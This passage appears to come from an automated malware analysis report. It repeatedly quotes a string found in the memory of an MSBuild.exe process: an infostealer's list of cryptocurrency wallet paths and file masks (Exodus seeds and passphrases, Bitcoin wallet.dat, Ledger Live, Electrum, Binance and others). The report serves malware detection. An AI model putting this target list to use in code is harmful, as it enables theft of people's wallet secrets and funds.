(Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda 